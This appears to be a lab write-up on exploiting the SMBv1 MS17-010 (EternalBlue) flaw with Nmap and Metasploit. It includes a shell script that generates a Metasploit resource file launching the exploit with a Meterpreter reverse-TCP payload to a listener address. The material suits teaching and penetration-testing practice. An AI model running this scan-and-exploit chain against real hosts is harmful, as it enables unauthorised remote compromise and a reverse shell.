Objective:
Identify a vulnerable Windows host, exploit the SMBv1 MS17-010 vulnerability, gain a Meterpreter session, escalate privileges, and migrate to a stable SYSTEM-owned process.
- Recon - Scan target for services and vulnerabilities.
- Exploit Selection - Choose appropriate exploit in Metasploit.
- Payload Setup - Configure payload and options.
- Initial Access - Gain shell access via exploit.
- Session Management - Background the shell and upgrade it to Meterpreter (if needed).
- Privilege Verification - Confirm the session runs as NT AUTHORITY\SYSTEM.
- Process Migration - Move Meterpreter into a stable SYSTEM-owned process so the session survives if the exploited service crashes.
My first step was to identify running services, their versions and any associated vulnerabilities. To do this I ran Nmap with the --script vuln argument, which runs the NSE scripts in the vuln category against each open port. This flagged smb-vuln-ms17-010 (CVE-2017-0143, remote code execution via SMBv1) on port 445.
With the information gained from the scan, I moved over to Metasploit. I searched for the reported vulnerability (search ms17-010) and selected the matching exploit module, in this case exploit/windows/smb/ms17_010_eternalblue.
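The recon and exploit-selection steps above, as an added example that is not the author's own commands: a POSIX shell script that runs the vuln scan, parses the smb-vuln-ms17-010 block of the Nmap report, and only emits a Metasploit resource script for ms17_010_eternalblue when the host is actually reported VULNERABLE. The target 10.10.10.40 and listener address 10.10.14.5 are placeholders, and the embedded Nmap report is constructed to mirror the NSE script's output format, not a capture from the lab host.

```shell
#!/bin/sh
# Added example for this write-up, not the author's own commands.
# Assumed values: TARGET 10.10.10.40 and LHOST 10.10.14.5 are placeholders
# for the lab target and the attacker's listener address.
TARGET="${TARGET:-10.10.10.40}"
LHOST="${LHOST:-10.10.14.5}"

# Constructed sample in the layout the smb-vuln-ms17-010 NSE script prints
# for a vulnerable host; it is not output captured from the lab machine.
SAMPLE_NMAP_OUTPUT='PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'

# Step 1, recon: the vuln-category scan from the write-up, narrowed to SMB so
# it finishes quickly. Prints the Nmap report for the caller to parse.
recon_scan() {
  nmap -sV -p 445 --script vuln "$1"
}

# Parse an Nmap report: return 0 only if the smb-vuln-ms17-010 block reports
# "State: VULNERABLE". A missing block, "State: NOT VULNERABLE", or a
# VULNERABLE line belonging to a different script's block returns 1.
is_ms17_010_vulnerable() {
  printf '%s\n' "$1" | awk '
    /^\| [a-z0-9-]+:/                { in_block = ($0 ~ /smb-vuln-ms17-010:/) }
    in_block && /State: *VULNERABLE/ { found = 1 }
    END { exit (found ? 0 : 1) }'
}

# Step 2, exploit selection and payload setup: emit a Metasploit resource
# script for exploit/windows/smb/ms17_010_eternalblue. "check" runs the
# module's own vulnerability probe before "run" throws the exploit.
build_msf_rc() {
  cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $1
set LHOST $2
set payload windows/x64/meterpreter/reverse_tcp
check
run
EOF
}

# With a target argument, scan it live; otherwise walk the constructed sample.
if [ $# -gt 0 ]; then
  report=$(recon_scan "$1")
else
  report=$SAMPLE_NMAP_OUTPUT
fi

if is_ms17_010_vulnerable "$report"; then
  # Save the output as ms17_010.rc and launch with: msfconsole -q -r ms17_010.rc
  build_msf_rc "$TARGET" "$LHOST"
else
  echo "smb-vuln-ms17-010 did not report VULNERABLE; not launching EternalBlue" >&2
fi
```

The parser keys on the `State:` line inside the ms17-010 block rather than on the word VULNERABLE anywhere in the report, because `--script vuln` runs several SMB scripts and one of the others may report its own finding. The generated resource file ends with `check` before `run`, which makes the module confirm the target is exploitable before the EternalBlue buffer grooming is attempted; a failed grooming against a non-vulnerable or patched host can crash the target rather than return a shell.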